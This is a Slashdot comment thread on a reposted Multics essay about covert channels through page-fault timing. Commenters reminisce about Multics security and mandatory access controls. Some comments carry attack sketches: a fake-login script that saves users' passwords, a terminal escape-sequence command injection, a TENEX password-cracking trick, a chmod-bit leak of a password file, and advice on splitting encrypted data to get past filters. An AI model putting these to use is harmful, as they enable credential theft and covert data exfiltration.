Surreptitious Communication via Page Faults
Martin Pomije writes "This is a really interesting story illustrating how a shared resource can also be a communication channel. If you have any interest in software design or operating systems, the Multics web site is worth your time. Tom Van Vleck has obviously put a lot of time into this and deserves credit for making all of this information available." It's like 10 years old, but it's really interesting.
Re:Why do we glorify cracking when its in the past (Score:1)
"trojan terminal" (Score:1)
Re:Surreptitious Communication via Slashdot (Score:1)
...And do you really think the moderators will fall for something so simplistic?
[...]
Damn, I wish I had thought of this one first!
---
pb Reply or e-mail; don't vaguely moderate [152.7.41.11].
Re:breaking passwords ? (Score:1)
Re:Slashdoted? Sorta. (Score:1)
Re:covert channels and mandatory access controls (Score:1)
--
Re:Communication channel from kernel to user space (Score:1)
Other than that, thumbs up. Never used Multics, so I can't say whether that part's right, but it sounds plausible.
#define X(x,y) x##y
DoS as a medium of communication (Score:1)
--
Re:Surreptitious Communication via Slashdot (Score:1)
signed executables? (Score:1)
fnord.
Can somebody please post the original content? (Score:1)
Bummer!
I came in late and the page is already "closed". Looks like the ISP "Best" or whatever isn't that good - they close down page access just when it starts to get interesting.
Can anyone please post the original content of that page? I'd love to know the details.
Thanks in advance!
Re:covert channels and mandatory access controls (Score:1)
Re:breaking passwords ? (Score:1)
But what used to be real fun in VMS was to malloc a ton of memory and write it out to a file. You could catch people's email and files, since the system didn't zero the pages at that time.
The (lack of) medium IS the message. (Score:1)
See, the article was submitted to
Slashdotting can be thought of as a form of communication. It's also the sincerest form of flattery on the Internet.
Re:yeah but so what (Score:1)
itachi
Re:Quite interesting. (Score:1)
-----------
"You can't shake the Devil's hand and say you're only kidding."
Linux scores again... (Score:1)
LINUS:
Logical Inquiry and Update System.
Java -- Re:signed executables? (Score:1)
Isn't this pretty much what Java does, but with less effort required on the part of the code producer than proof-carrying code? So JavaOS is an OS which has the capabilities you're inquiring about.
The JVM takes the bytecodes when it loads them and runs them through its verifier (a limited sort of theorem prover) to check that the code doesn't do anything illegal, and when the code gets run, the Java security model works so that any attempt by the code to access system resources is checked by the security manager before being permitted.
When you combine this with the fact that, as of JDK 1.2, developers can easily create custom permissions for their apps and can require mobile code that needs those permissions to be signed by a trusted party, you get a system that seems to me to be much more powerful and easier to use than the one in the paper on proof-carrying code.
Re:Covert channels, bandwidth and trojan spooks (Score:1)
Re:Covert channels, bandwidth and trojan spooks (Score:1)
> supply of frozen pizzas and an oven, or even an
> in-house pizzeria. Sounds like a good
> excuse to me.
But TEMPEST shielding does not cover pizza smells.
This means somewhere someone is spending lots of my tax money on TEMPER (Transient EMitted Pizza Essence Remover)
Re:signed executables? (Score:1)
OS-9 [microware.com] from Microware used to run a CRC-16 over code before it would load or run a module on the 6809 (an 8-bit CPU).
This concept could be extended today, but it would take a bit more work because modern programs don't load the whole body of code before running. How would this work? You could put a signing key in the file header and then MD5 each block, but how would the VM system deal with the extra data in the blocks? For code blocks you can tell GCC to waste the last 4 bytes of a VM block (as was done on the 32016), but that involves a bunch of jumps that new CPUs don't handle well. The other choice is to have the VM system load the needed block plus the next few bytes off the disk, do an MD5-like hash over the block and the signing key, and then throw away the part that holds the key, but that destroys any one-to-one relationship between disk images and memory.
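For flavor, here's a minimal sketch of the per-block idea (Python, with a made-up block size and HMAC-MD5 standing in for a real signature; this isn't how OS-9 or any real VM system did it). Keeping the per-block MACs in a separate table, rather than inside the code blocks, also sidesteps the problem of extra data breaking the one-to-one mapping between disk and memory:

    import hmac, hashlib

    BLOCK_SIZE = 4096          # assumed page/block size
    SIGNING_KEY = b"demo-key"  # stands in for a key carried in the file header

    def sign_module(code: bytes) -> list:
        """Produce one MAC per block; a real scheme would sign this whole table."""
        blocks = [code[i:i + BLOCK_SIZE] for i in range(0, len(code), BLOCK_SIZE)]
        return [hmac.new(SIGNING_KEY, b, hashlib.md5).digest() for b in blocks]

    def load_block(code: bytes, index: int, macs: list) -> bytes:
        """Verify a single block on demand, the way a VM system pages code in."""
        block = code[index * BLOCK_SIZE:(index + 1) * BLOCK_SIZE]
        expected = hmac.new(SIGNING_KEY, block, hashlib.md5).digest()
        if not hmac.compare_digest(expected, macs[index]):
            raise ValueError(f"block {index} failed verification; refusing to run it")
        return block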
Reminds me of Heinlein's "Friday" signaling bit (Score:1)
The message about slashdot posting is more like this. Post a message in public that only the receiver will know what to do with.
What is old, will be new again (Score:1)
First, the classic book on Multics - The Multics System: An Examination of Its Structure by the late Elliott Irving Organick - is a snapshot of a work in progress. If you've read the book, you'll have a good feeling for what the group was doing, but not particularly for what Multics finally turned out to be.
Second, there is recurring discussion in the USENET news group alt.os.multics about a re-implementation of the Multics hardware environment (including tagged memory) on something like a PCI card, then using the PC as the I/O system. This, of course, is possible because ASICs and DRAM are perpetually getting less expensive. The actual ownership of Multics will have to be worked out before that can happen. Someone should encourage the present owners to GPL the source and binaries.
It always strikes me as sad that Multics is old, yet its O/S ideas are, in large part, still state of the art. It says something pretty vile about contemporary O/S and architecture research, experimentation and design. Von Neumann CPUs and Unix are not horrible designs (thus they've been successful), but if we want orders-of-magnitude improvements now, then it is time to re-evaluate the basics. Seymour Cray came up with the majority of the improvements (hacks, if you will) to the von Neumann architecture in the 1960s and 70s. Intel (et al.) has been living off those ideas for two decades. It's time for new ideas (yes, perhaps like the late Intel iAPX 432).
Finally, I wish Linus had read about Multics before he re-implemented Unix. We'd all be in better shape if that were the case. Then Linux could genuinely be said to be state of the art, not just state of the practice.
The Slashdot Effect (Score:1)
I can't currently get to the US mirror either, so I am not including the link here.
Re:Surreptitious Communication via Slashdot (Score:1)
That's simply not true. Just take the Socialist Worker's Party or the Socialist Party, both in Britain. Both "revolutionary", although the first believes in violence, the latter in getting elected.
Unfortunately, both words have become extremely corrupted and debased this century by Cuba, the Soviet Union and China, who were and are not truly socialist (my definition of socialism includes participatory democracy). Even more unfortunately, there isn't a better word for the political view that I support than socialism.
Re:breaking passwords ? (Score:1)
This particular exploit actually used the "page faults per process" metric provided by the OS, rather than the timing information, IIRC.
Communication channel from kernel to user space (Score:1)
An acquaintance of mine told me that he had broken into a multics system by writing a driver which a) did the driver's job and b) read the password file and communicated it one bit at a time to a user-space program via toggling rwx bits in some file known to both driver and user program.
He was smart enough that it was probably true.
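To make the trick concrete, here's a rough sketch of the idea (Python, on an ordinary Unix filesystem rather than Multics, with an invented file path and a crude fixed-delay clock standing in for real synchronization):

    import os, stat, time

    CHANNEL_FILE = "/tmp/innocuous_file"   # any file both sides can stat and chmod
    BIT_DELAY = 0.5                        # seconds per bit; crude synchronization

    def send_bits(bits):
        """Privileged side: encode each bit as the 'other-execute' permission bit."""
        for b in bits:
            mode = stat.S_IMODE(os.stat(CHANNEL_FILE).st_mode)
            new_mode = (mode | stat.S_IXOTH) if b else (mode & ~stat.S_IXOTH)
            os.chmod(CHANNEL_FILE, new_mode)
            time.sleep(BIT_DELAY)

    def receive_bits(count):
        """Unprivileged side: sample the same permission bit on the same schedule."""
        bits = []
        for _ in range(count):
            bits.append(1 if os.stat(CHANNEL_FILE).st_mode & stat.S_IXOTH else 0)
            time.sleep(BIT_DELAY)
        return bits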
Re:Slashdoted? Sorta. (Score:1)
Re:CmdrTaco is a valley girl? Like totally! (Score:1)
Re:breaking passwords ? (Score:1)
PDP-10 (the 36-bit line of PDP's).
Actually, this can also be found in AST's Minix book.
Re:yeah but so what (Score:1)
Yup. IPC and all that (not to mention just leaving a file with any kind of data you want in it).
Re:Communication channel from kernel to user space (Score:1)
1) If his 'driver' had access to the password file, why did it waste time sending it one bit at a time?
2) Did the people that ran that system really trust him so much that nobody checked his driver code?
Anyways, that wasn't a very incredible feat, imho.
It's two system calls (i.e., read and chmod on the driver side and an lstat? on the client side).
Re:breaking passwords ? (Score:1)
Steff
yeah but so what (Score:1)
Re:Covert channels, bandwidth and trojan spooks (Score:1)
To be completely fair/let no one know you get aroused by beautiful women/not insult anyone, you also have to run into the water with ugly women...
Just an analogy...
Never thought my running into the water was actually covering up a covert comm-channel!
i beg to differ! (Score:1)
sincerely,
most slashdotters
It was posted above (Score:1)
Re:Why do we glorify cracking when its in the past (Score:1)
Yeah, they get paid for it.
Welcome to the bottom line, folks.
Data reader certification (Score:1)
File encryption always helps. You can encrypt your data file into something that looks like a text document (even a document that has some textual meaning), then take the document apart into small pieces and send those pieces in no particular order. By themselves the pieces will not have any special meaning and will look benign to the file filters and detectors.
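A toy sketch of just the split-and-reorder step (Python; it assumes the data has already been encrypted by whatever means, and tags each piece with a sequence number so the receiver can put them back together):

    import random

    def split_into_pieces(ciphertext: bytes, piece_len: int = 16):
        """Tag each piece with its position so the receiver can reassemble them."""
        pieces = [(i, ciphertext[i:i + piece_len])
                  for i in range(0, len(ciphertext), piece_len)]
        random.shuffle(pieces)     # send them in no particular order
        return pieces

    def reassemble(pieces) -> bytes:
        return b"".join(chunk for _, chunk in sorted(pieces))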
You must always think ahead
Quite interesting. (Score:1)
With the way things are going, how can we know what information will still be "legal" next month. At least for those of us in the US, it might be a good idea to start forming some way of maintaining freedom in spite of the courts and big business.
If we have to choose which book to become, I'll become a fanfic long-form story set in the DBZ universe (I love the author; well, at least what I've read so far).
-Nathaniel
Re:Covert channels, bandwidth and trojan spooks (Score:1)
Countries who care what the US is up to always know when something important is about to happen, because the number of late-night pizzas delivered to offices at the Pentagon and State Department skyrockets.
It doesn't seem too covert, though. After all, the spy school instructors knew all about it and it was a common joke throughout the US intelligence community.
Chris
Re:Surreptitious Communication via Slashdot (Score:1)
The difference is that communists want to achieve their goal with a revolution, whereas socialists believe in a more gradual change.
So is Linux socialistic or communistic? I think more socialistic (unless you count the 'nuke redmond' attitude most slashdotters have).
Grtz, Jeroen
Re:Surreptitious Communication via Slashdot (Score:1)
A lot of communists (the real kind) today call themselves socialists because, for most people, communism stands for a totalitarian regime.
Grtz, Jeroen
p.s. I regard myself as a socialist too (the non-violent, pro-democracy kind)
Re:Why do we glorify cracking when its in the past (Score:1)
same reason they should care if i got shot
doesnt SGI use this? (Score:1)
Communications via GPF's (Score:1)
Sounds workable (Score:1)
-- Ben
Covert channels (Score:1)
Re:Please think before moderating... (Score:1)
Re:covert channels and mandatory access controls (Score:2)
Secondly, any time two people have access to the same area, be it a physical area or shared computing resource, there is the risk of covert communications. The only way to prevent it is to remove access to all but one person.
Multics was designed primarily to share expensive computing resources. Computing resources are much cheaper now, so it is more feasible to prevent covert communications by just plain not sharing. Each person in a hypersecure installation would have their own computer, without even a conventional LAN, with communications between the systems being tightly controlled and monitored.
----
Another good Multics story... (Score:2)
Re:Communication channel from kernel to user space (Score:2)
The easiest way to get a password in Multics was the old "trojan terminal" trick. Multics was usually accessed via crowded terminal rooms, and there was often a waiting list to get on (remote access back then was very expensive and few Multics installations had any remote access). Log in, run your trojan (which put up a fake login prompt), walk away. Someone else jumps on your "open" terminal, tries their personid, projectid, and password, gets a 'login incorrect' message (at which point your program surreptitiously exits and logs out, having saved the data to a file somewhere), and then they get the "real" login prompt. Classic, simple, almost undetectable!
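The skeleton of such a trojan is tiny. A rough sketch in Python (obviously not the original Multics code; the prompt strings and the log file name are invented) just to show the shape of it:

    import getpass

    LOG_FILE = "captured.txt"   # stashed somewhere the attacker can read later

    def fake_login():
        """Imitate the system's login prompt once, record what gets typed, then bail."""
        user = input("login: ")
        password = getpass.getpass("password: ")
        with open(LOG_FILE, "a") as f:
            f.write(f"{user} {password}\n")
        print("login incorrect")
        # Exit and log out here; the victim then gets the real login prompt.

    if __name__ == "__main__":
        fake_login()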
Of course, that wasn't the holy grail. The holy grail was getting one of the operators' passwords, or somehow executing commands as an operator to create a ring0 gate for you (basically same as creating a suid root /bin/sh). I'm trying to remember whether it was Multics that someone tried the "smart terminal" attack on, or whether we'd already moved to Unix by that time. The TVI912 terminal would transmit the contents of its screen to the remote system when you sent ESC-7. So send a clear screen, the commands to be executed, and then ESC-7 as the payload of a Unix "write" command (or Multics equivalent -- still trying to remember whether Multics had an equivalent, darn it!), and guess what happens? (Oh, make sure to clear the screen again after you've sent the payload!). Of course, after the first time, the operators remembered to turn off messages ("biff n" on Unix) :-).
-E
Re:Glad to see some credit given to Multics ... (Score:2)
As I remember, System/360 storage keys were associated with large (4K?) regions of memory; they weren't associated with individual words, as tags are on the Burroughs machines (and their successors) and on the PowerPC AS/400's. I tend to think of "tags" as applying to individual words; do storage keys protect down to the word level on S/390?
Re:Glad to see some credit given to Multics ... (Score:2)
It's in the PowerPC AS/400's [ibm.com], at least according to Frank Soltis' Inside the AS/400 book - there are tag bits in the extended PowerPC architecture used in the AS/400's.
It's also presumably still in the Unisys ClearPath LX [unisys.com] and ClearPath NX [unisys.com] series, which include processors that are presumably the latest generation of the line of machines that started with the Burroughs mainframes.
Re:Please think before posting (Score:2)
No, it didn't.
The poster to whom you're responding was mistaken; they didn't use XML, they used SGML.
(Or, as the banner on this site should perhaps read:
Slashdot
YHBT. YHL. HAND.)
What are you trying to secure? (Score:2)
Covert channels are not a security risk if your concern is keeping the wrong person from getting control of your computer.
Cheers,
Ben
a real life example (Score:2)
Finding stuff in unused disk blocks (Score:2)
One time I did a disk dump from the raw disk device to the console, and after a few pages of binary gibberish, out came several pages of operating system kernel source code! Apparently, Digital, when it made up the master disk for the operating system binary distribution, reused a floppy that had previously contained operating system source code, and never bothered to zero out the disk. Interesting stuff!
Re:covert channels and mandatory access controls (Score:2)
Different problem. TEMPEST is concerned with information leakage via electro-magnetic radiation.
Covert channels are a concern in multi-level secure systems where information of different classifications and compartments are processed on a single system. A process running in a Top Secret context should not be able to send classified information to a process running in a Confidential context.
Re:Finding stuff in unused disk blocks (Score:2)
Doing a fresh 'Save As' was a fine work-around, but most people were shocked when I pointed this out to them.
Re:breaking passwords ? (Score:2)
Re:Slashdoted? Sorta. (Score:2)
The total amount is compared against the last 24 hours, computed on the hour. Check just after the hour and you may get thru, before he's back over the limit again.
This is just like any other quota system to keep one user from hogging an unfair share of the available resources, in this case bandwidth, hits or cgi cpu cycles.
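Something like this rolling-hourly-bucket check, in spirit (Python; the window, the limit, and the hourly granularity are only guesses at how Best's setup worked):

    from collections import deque

    HOURLY_WINDOW = 24          # compare against the last 24 hours
    DAILY_LIMIT = 500_000_000   # bytes per rolling day; a made-up figure

    class SiteQuota:
        def __init__(self):
            self.hourly_bytes = deque([0] * HOURLY_WINDOW, maxlen=HOURLY_WINDOW)

        def roll_hour(self):
            """Run on the hour: the oldest bucket drops out of the window."""
            self.hourly_bytes.append(0)

        def record(self, nbytes: int):
            self.hourly_bytes[-1] += nbytes

        def over_limit(self) -> bool:
            return sum(self.hourly_bytes) > DAILY_LIMIT

Right after roll_hour() runs, the 24-hour total can dip back under the limit for a little while, which is why checking just after the hour sometimes gets you through.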
Re:Quite interesting. (Score:2)
-----------
"You can't shake the Devil's hand and say you're only kidding."
breaking passwords ? (Score:2)
Re:yeah but so what (Score:2)
Most B2 systems have several user groups, each in a different security realm. You can be in several realms, and you may be able to copy info from one area to another, but generally you can't go the other way without downgrading the data, which of course requires other levels of access. Real access control is not easy to do and is very, very complicated.
When I ran a news server for the AF I used to feed news to a B2-certified system. I never knew if it got the news or not, because it never responded. It had a dedicated hunk of hardware that did TCP/IP and simply acked everything. It was like sending bits off into the ether.
Re:Quite interesting. (Score:2)
So the question becomes, how can I not get caught? Spreading information via covert channels (the technical term for this sort of communication) makes it very hard for said agents to even suspect my actions, and to gather evidence for a conviction.
(Note to my fans in domestic surveillance: only kidding, everyone knows I'm a good law-abiding American.)
Slashdoted? Sorta. (Score:2)
Sorry, temporarily closed
My internet service provider, Best Internet Communications, limits the number of hits and the bandwidth each web site can consume, and my site is past its limit.
http://www.multicians.org:80/limit.html
Write only files (Score:2)
Sorry guys (Score:2)
Re:covert channels and mandatory access controls (Score:2)
Actually, this doesn't affect most Slashdot users because the operating systems they use have such lousy security that there are far easier attacks than using a covert channel. This applies to all the UNIX variants and all the Microsoft products. (Yes, it does. If it didn't, there wouldn't be new CERT advisories every week.)
There are solutions to the covert channel problem, but people hate them. Applications have to be denied access to an accurate timebase, which means no clock with resolution finer than a second, introducing deliberate jitter into the CPU dispatching, and adding some random delay to I/O operation responses. Forget playing games or multimedia.
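As a small illustration of the kind of countermeasure being described (Python; the one-second granularity and the jitter bound are arbitrary numbers, not anything from a real evaluated system):

    import random, time

    CLOCK_GRANULARITY = 1.0   # seconds; no finer timebase exposed to applications
    MAX_IO_JITTER = 0.050     # up to 50 ms of random delay on each I/O completion

    def fuzzy_clock() -> float:
        """The only clock an application gets to see: truncated to whole seconds."""
        return time.time() // CLOCK_GRANULARITY * CLOCK_GRANULARITY

    def complete_io(result):
        """Delay every I/O completion by a random amount to blur timing channels."""
        time.sleep(random.uniform(0.0, MAX_IO_JITTER))
        return result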
The big win is that in a system with mandatory security and covert-channel protection, even if a virus or trojan horse gets access to secured data, it can't get the data out of the box.
I used to develop secure operating system kernels for a DoD contractor. The current state of operating system security is worse than it was twenty years ago. Users will choose animated penguins over security. What passes for "computer security" today is mostly aimed at keeping amateurs from blatantly interfering with servers. And it can't even do that successfully. A serious attack is much more subtle.
In the DoD world, one worries about two main threats. The intelligence community worries about the attacker obtaining some information they have without an alarm being raised. The military worries about the attacker interfering with their systems at a time chosen by the attacker, probably at a key moment of a military operation. The attacker is assumed to have enough resources to duplicate the systems being attacked and to practice on them. There's also the assumption that physical and computer intrusions might be used together.
Enough rant for now. Go read some NSA evaluations of security products. [ncsc.mil]
Re:Covert channels, bandwidth and trojan spooks (Score:2)
This actually sounds like just a special case of traffic analysis. Traffic analysis is one thing that you can do if you can intercept but not decrypt your enemy's transmissions. When his signal traffic increases suddenly, you know something is up.
If you really want to be paranoid about signal security, you have to send out a background of boring messages at least as big as your expected peak traffic. You could, for instance, send out messages that said "Ignore me" padded with whitespace (and then encrypted) at periodic intervals. When you actually want to send a real message, you'd substitute your real message for one of the fake ones. Of course this is something that computers are very good for; they can mimic the length patterns of real messages and automatically ignore the bogus received messages.
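A rough sketch of that constant-rate padding scheme (Python; the interval, the fixed message size, and the "IGNORE ME" marker are all invented for the example, and encryption is left out):

    import queue, time

    SEND_INTERVAL = 60.0     # one message per minute, whether or not there is news
    MESSAGE_SIZE = 256       # every message padded to the same length
    outbox = queue.Queue()   # real messages wait here until a slot comes up

    def pad(payload: bytes) -> bytes:
        return payload.ljust(MESSAGE_SIZE, b" ")

    def sender(transmit):
        """Every interval, send a real message if one is queued, otherwise a dummy."""
        while True:
            try:
                msg = outbox.get_nowait()
            except queue.Empty:
                msg = b"IGNORE ME"       # the receiver silently drops these
            transmit(pad(msg))           # a real system would encrypt before sending
            time.sleep(SEND_INTERVAL)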
By analogy, the State and Defense departments could constantly order late night pizzas even when nothing interesting was going on. A more practical alternative would be to have a supply of frozen pizzas and an oven, or even an in-house pizzeria. Sounds like a good excuse to me.
duh, there are MIRRORS (Score:2)
ftp://ftp.stratus.com/pub/vos/multics/tvv/timing-chn.html
bah. why repost an article when a URL will do?
Re:signed executables? NO, Use Proof Carrying Code (Score:3)
http://www.cs.cmu.edu/~petel/papers
Glad to see some credit given to Multics ... (Score:3)
I was able to use Multics for four years in college, and that experience gave me more insight and wisdom than any four years spent with Unix, Windows, or MacOS.
(In the areas of system design, that is! The only graphics expertise I gained from Multics was how to do simple bitmap images using the lineprinter!)
An unapologetic former Multician,
Stan Chesnutt
Re:Communication channel from kernel to user space (Score:3)
...and, at least in the older processors only in a segment tagged as a segment whose code should run in "master mode"; even most of the ring 0 code couldn't execute privileged instructions - it could only call small routines in one of those segments (said segments were, presumably, inaccessible outside of ring 0). The entry for "privileged mode" in the Multics site (well, mirror site at Stratus, anyway) glossary [stratus.com] says:
Hardware and/or microcode - the GE 645 and 6180 had no microcode; the Multics site glossary entry for the 6180 [stratus.com] says:
Here's a digusting Example (Score:3)
Re:Slashdoted? Sorta. (Score:3)
Tom Van Vleck
About 1976, I was explaining Multics security to a colleague at Honeywell. (This was before it got the B2 rating, but the mandatory access control mechanism was present.) I explained the difference between storage channels and timing channels, and said that timing channels weren't important because they were so slow, noisy, and easily clogged that you couldn't send a signal effectively.
My friend, Bob Mullen, astounded me a few days later by showing me two processes in the terminal room. You could type into one and the other would type out the same phrase a few seconds later. The processes were communicating at teletype speed by causing page faults and observing how long they took. The sender process read or didn't read certain pages of a public library file. The receiver process read the pages and determined whether they were already in core by seeing if the read took a long or short real time. The processes were running on a large Multics utility installation at MIT under average load; occasionally the primitive coding scheme used would lose sync and the receiver would type an X instead of the letter sent. If you typed in "trojan horse," the other process would type "trojan horse" a little later, with occasional X's sprinkled in the output.
Bob pointed out that noise in the channel was irrelevant to the bandwidth (Shannon's Law). Suitable coding schemes could get comparable signalling rates over many different resource types, despite countermeasures by the OS: besides page faulting, one could signal via CPU demand, segment activation, disk cache loading, or other means.
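To make the mechanism concrete, here is a toy sketch of the two sides (Python, using ordinary file reads on a shared file in place of Multics page faults; the file path, page size, and threshold are invented, and a real exploit would need the coding and synchronization tricks described above):

    import time

    SHARED_FILE = "/library/public_segment"   # any file both processes can read
    PAGE_SIZE = 4096
    CACHE_THRESHOLD = 0.001   # seconds; a faster read means the page was in memory

    def send_bit(page_index: int, bit: int):
        """Sender: reading the page pulls it into memory (a 1); skipping it leaves it cold (a 0)."""
        if bit:
            with open(SHARED_FILE, "rb") as f:
                f.seek(page_index * PAGE_SIZE)
                f.read(PAGE_SIZE)

    def receive_bit(page_index: int) -> int:
        """Receiver: time the same read and infer whether the sender touched the page."""
        start = time.monotonic()
        with open(SHARED_FILE, "rb") as f:
            f.seek(page_index * PAGE_SIZE)
            f.read(PAGE_SIZE)
        return 1 if (time.monotonic() - start) < CACHE_THRESHOLD else 0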
When I thought about this I realized that any dynamically shared resource is a channel. If a process sees any different result due to another process's operation, there is a channel between them. If a resource is shared between two processes, such that one process might wait or not depending on the other's action, then the wait can be observed and there is a timing channel.
Closing the channel Bob demonstrated would be difficult. The virtual memory machinery would have to do extra bookkeeping and extra page reads. To close the CPU demand channel, the scheduler would have to preallocate time slots to higher levels, and idle instead of making unneeded CPU time available to lower levels.
Bob and I did not compute the bandwidth of the page fault channel. It was about as fast as electronic mail for short messages. A spy could create a Trojan Horse program that communicated with his receiver process, and if executed by a user of another classification, the program could send messages via timing channels despite the star-property controls on data.
The rules against writing down were designed to keep Trojan Horse programs from sending data to lower levels, by ensuring that illegal actions would fault. In this case, the sender is doing something legal, looking at data he's allowed to, consuming resources or not, and so on. The receiver is doing something legal too, for example looking at pages and reading the clock. Forbidding repeated clock reading or returning fake clock values would restrict program semantics and introduce complexity.
I believe we need a mechanism complementary to the PERMISSION mechanism, called a CERTIFICATION mechanism. This controls the right to Execute software, while permission controls the Read and Write flags. A user classified Secret is not allowed to execute, at Secret level, a program certified only to Unclassified. Programs would only be certified to a given level after examination to ensure they contained no Trojan Horses. This kind of permission bit handling is easy to implement, and if the site only certifies benign programs, all works perfectly.
How do we examine programs to make sure they have no Trojan Horses? The same way we examine kernels to make sure they don't. Examining application code to ensure it doesn't signal information illegally should be easier than the work we have to do on a kernel.
Do we need to forbid write down for storage, if we allow write down via timing channels? It's inconsistent to forbid some write down paths and allow others. The main reason for preventing write down is not to stop deliberate declassification (a spy can always memorize a secret and type it into an unclassified file), it's to protect users from Trojan Horse programs leaking information. The certification approach solves this problem a different way, by providing a way to prevent execution of Trojan Horse programs.
Who should be allowed to certify a program to a given level? I think anyone who can create a program to execute at level X should be able to take a lower level program and certify it to level X. We can't stop a malicious user from creating a transmitter program, unless we forbid all program creation at level X. Other policies are possible; a site could centralize all program certification as a security officer responsibility. In any case, the OS should audit every certification and store the identity of the certifier as a file attribute.
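A toy model of how such a certification attribute might sit alongside the usual permission checks (Python; the level names, attributes, and audit log are illustrative only, not Multics code):

    LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}
    audit_log = []   # the OS records every certification event

    def certify(program: dict, target_level: str, certifier: str):
        """Raise a program's certification level and remember who did it."""
        program["certified_to"] = target_level
        program["certified_by"] = certifier
        audit_log.append((program["name"], target_level, certifier))

    def may_execute(user_level: str, program: dict) -> bool:
        """A Secret user may not execute, at Secret, a program certified only lower."""
        return LEVELS[program["certified_to"]] >= LEVELS[user_level]

    # Example: a Secret user and a program certified only to Unclassified.
    prog = {"name": "report_tool", "certified_to": "Unclassified", "certified_by": None}
    assert not may_execute("Secret", prog)            # might be a Trojan Horse
    certify(prog, "Secret", certifier="security_officer")
    assert may_execute("Secret", prog)                # allowed after examination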
[1] Honeywell, Multics Security Administration manual ####.
[2] Bell, D. E. and L. J. LaPadula, Computer Security Model: Unified Exposition and Multics Interpretation, ESD-TR-75-306, Hanscom AFB, MA, 1975 (also available as DTIC AD-A023588).
[3] Bell, D. E., and L. J. LaPadula, Secure Computer Systems: Unified Exposition and Multics Interpretation, Mitre Technical Report MTR-2997, rev 2, March 1976.
[4] Biba, K. J., S. R. Ames, Jr., E. L. Burke, P. A. Karger, W. R. Price, R. R. Schell, W. L. Schiller, The top level specification of a Multics security kernel, WP-20377, MITRE Corp, Bedford MA, August 1975.
Re:Glad to see some credit given to Multics ... (Score:3)
In many ways we of the Present have NIH syndrome. It can't be good unless it's new. But you know what they say...
A month in the lab can often save an afternoon in the Library.
Say, whatever happened to tagged storage?
Regards, your friendly neighbourhood cranq
Re:yeah but so what (Score:3)
Re:Covert channels (Score:3)
at erights.org [erights.org]
The computer security fact forum [caplet.com]
Covert channels, bandwidth and trojan spooks (Score:4)
The classic tradeoff between probability of detection and bandwidth of the covert channel operates here, but if the amount of data which needs to be communicated is low then the trojan spook always wins against the guardian.
On the other hand, detection of the covert communication is an interesting problem in its own right, because it boils down to the problem of telling the remote party exactly where to find the significant data among gigabits of obfuscation --- effectively the same problem as key exchange in crypto!
Valid Link here (Score:4)
See alternate location [stratus.com].
Surreptitious Communication via Slashdot (Score:5)
Program A writes to a random thread [slashdot.org].
Program A-2 loads the thread, and moderates up the post, using karma from its auto-"Linux is not socialist" post feature (such posts are always informative).
Program B (the receiver) loads the thread likewise, using Highest Scores First, and reads the posts marked up to two. It then leaves a "Linux is socialist" post. Invariably, a moderator will find this, take offence, and moderate it down.
Program A will, by continuously re-loading the thread, notice the new (Score: -1, Troll) post, and will be assured that the communication was successful. Program execution will then continue as normal.
Hmmm...maybe I should patent it.
Re:breaking passwords ? (Score:5)
Yes, there was a paper by Butler Lampson on system design (it was in the proceedings of some conference, I think, published in an issue of some ACM SIG's journal; alas, I no longer have the journal issue in question) about that.
As I remember, this was on TENEX, and was an unintended consequence of a feature allowing an application to catch (or, at least, be notified of) page faults - or it may have been protection faults (e.g., SIGSEGV or SIGBUS on UNIX) - from userland.
Files, if I remember the paper correctly, could be protected with a password in TENEX, and you specified the password in the call to open the file.
Normally, you'd have to cycle each character of the password independently, in order to try a brute-force password search.
However, the code that did the password checking would, if I remember the paper correctly, fetch a character of the password, check it, and either fail immediately or continue on fetching the next character and checking it.
You could then try opening the file with an N-character password, with the second character placed so that the fault in question would occur if the system tried to fetch it (i.e., either on the next page, or not in the address space if the fault wasn't just a "page me in" fault). You'd start with the first legal character value for all characters.
If the attempt to open the file succeeded, you win.
If it fails without a fault, you know that it didn't bother trying to fetch the next character, and therefore you know that the first character wasn't the right one; you'd then replace it with the next character value, and try again.
If it fails with a fault, you know that it did try to fetch the next character, and therefore you know that the first character is the right one. You then set up a password with that character as the first character, and with the second character being the first legal character value, and with the third character being on the next page, and repeat the process with the second character.
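In pseudo-Python, the guessing loop looks roughly like this (the page-fault signal is simulated with a return value from a toy stand-in for the TENEX open call; the real system call obviously didn't look like this):

    ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"

    def try_open(guess: str, fault_index: int, real_password: str) -> str:
        """Toy stand-in for the TENEX file-open call. It compares the guess one
        character at a time, so it returns 'fault' as soon as it would have had
        to fetch the character at fault_index, 'fail' if a character mismatches
        before that, and 'ok' only for an exact match."""
        for i in range(len(real_password)):
            if i >= fault_index:
                return "fault"
            if i >= len(guess) or guess[i] != real_password[i]:
                return "fail"
        return "ok" if len(guess) == len(real_password) else "fail"

    def crack(real_password: str, max_len: int = 16) -> str:
        known = ""
        for _ in range(max_len):
            for ch in ALPHABET:
                # Maybe known + ch is already the whole password.
                if try_open(known + ch, max_len + 1, real_password) == "ok":
                    return known + ch
                # Lay the guess out so the character *after* ch sits on the
                # unmapped page: a fault means ch was accepted for this position.
                if try_open(known + ch + "?", len(known) + 1, real_password) == "fault":
                    known += ch
                    break
            else:
                break   # no candidate matched; give up with what we have
        return known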
covert channels and mandatory access controls (Score:5)
In the DoD, for instance, there are situations where you would want to do this. You don't want to allow someone viewing Top Secret data to have their information leaked to someone who isn't cleared for it.
This is why Mandatory Access Controls were invented. A lot of slashdotters have probably heard of the Orange Book, in which the DoD laid out a method of classifying the security model of computer systems. Unix variants are roughly C-1'ish, which DoD doesn't even certify anymore. OSes with ACLs and such (like NT) are roughly C-2'ish (now whether NT actually gets the job done or not is up for debate). Once you get to the B and A levels, you have Mandatory Access Controls. They are designed to prevent one user from leaking classified data to another person. In a MAC system, you should not be able to "chmod" or "chown" a file to allow someone else to view it.
It goes a little bit deeper, though. You also need to protect against more subtle methods of communication, called covert channels. In a covert storage channel, a user would fill up a disk and another user would be able to tell, or one would write to a file that another had access to read, or one would twiddle a file lock. In a covert timing channel, one user would perform a CPU intensive process and the other user would be able to tell that the responsiveness of the system changed, or the user would perform an I/O intensive application and the other user would be able to tell that his own disk accesses were more or less responsive. In this way, users can communicate via manipulating shared resources.
It's not very sexy, but it is something that DoD and the intelligence community in particular care very much about. As you can guess, these aren't easy problems to solve (if they are solvable at all).
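As a toy illustration of a covert storage channel (Python; the scratch path, sizes, and timing are invented, and in practice this would be slow, noisy, and easy to spot), one process signals bits by filling or freeing disk space while a lower-level process watches the free-space figure:

    import os, shutil, time

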